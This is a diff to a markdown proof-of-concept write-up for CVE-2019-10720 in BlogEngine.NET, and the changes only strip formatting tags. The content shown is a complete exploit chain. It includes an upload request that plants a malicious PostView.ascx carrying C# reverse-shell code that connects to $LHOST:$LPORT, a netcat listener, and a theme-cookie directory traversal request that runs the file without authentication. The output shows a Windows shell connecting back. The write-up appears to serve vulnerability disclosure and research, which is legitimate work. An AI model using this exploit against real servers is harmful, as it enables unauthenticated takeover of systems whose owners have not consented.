--- a/2019-10720/2019-10720.md
+++ b/2019-10720/2019-10720.md
@@ -28,11 +28,11 @@ The application will use the **theme** cookie if the **theme** parameter is not 
 423                         return request.QueryString["theme"];
 424                     }
 425
-<r:b>426                     var cookie = request.Cookies[this.ThemeCookieName];
+426                     var cookie = request.Cookies[this.ThemeCookieName];
 427                     if (cookie != null)
 428                     {
 429                         return cookie.Value;
-430                     }</r:b>
+430                     }
 ~~~
 
 The **theme** cookie is vulnerable to a directory traversal; the **theme** cookie can be set to a folder that contains a malicious `PostView.ascx`, such as `.../../App_Data/files`.  The malicious code contained in `PostView.ascx` will be executed.
@@ -47,12 +47,12 @@ A malicious file can be uploaded using `File Manager` in the application, `/api/
 
 ~~~
 POST /api/upload?action=file HTTP/1.1
-Host: <r:var>$RHOST</r:var>
+Host: $RHOST
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/plain
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
-Cookie: .AUXBLOGENGINE-96d5b379-7e1d-4dac-a6ba-1e50db561b04=<r:redacted>COOKIE</r:redacted>
+Cookie: XXX
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
@@ -70,7 +70,7 @@ Content-Disposition: form-data; filename="PostView.ascx"
     protected override void OnLoad(EventArgs e) {
         base.OnLoad(e);
 
-		using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("<r:var>$LHOST</r:var>", <r:var>$LPORT</r:var>)) {
+		using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT)) {
 			using(System.IO.Stream stream = client.GetStream()) {
 				using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
 					streamWriter = new System.IO.StreamWriter(stream);
@@ -117,27 +117,27 @@ Content-Disposition: form-data; filename="PostView.ascx"
 
 The exploit can be triggered by opening a `netcat` listener:
 
-~~~{command="nc -nlvp <r:var>$LPORT</r:var>"}
-listening on [any] <r:var>$LPORT</r:var> ...
+~~~{command="nc -nlvp $LPORT"}
+listening on [any] $LPORT ...
 ~~~
 
 Browsing to the application with the **theme** cookie set to `../../App_Data/files/2019/06/`, no authentication required, triggers the Code Execution and opens a reverse shell:
 
 ~~~
 GET / HTTP/1.1
-Host: <r:var>$LHOST</r:var>
+Host: $LHOST
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
-Cookie: <r:var>theme</r:var>=<r:b>../../App_Data/files/2019/06</r:b>;
+Cookie: theme=../../App_Data/files/2019/06;
 Connection: close
 Upgrade-Insecure-Requests: 1
 ~~~
 
-~~~{command="nc -nlvp <r:var>$LPORT</r:var>"}
-listening on [any] <r:var>$LPORT</r:var> ...
-connect to [<r:var>$LHOST</r:var>] from (UNKNOWN) [<r:var>$RHOST</r:var>] 49822
+~~~{command="nc -nlvp $LPORT"}
+listening on [any] $LPORT ...
+connect to [$LHOST] from (UNKNOWN) [$RHOST] 49822
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 ipconfig
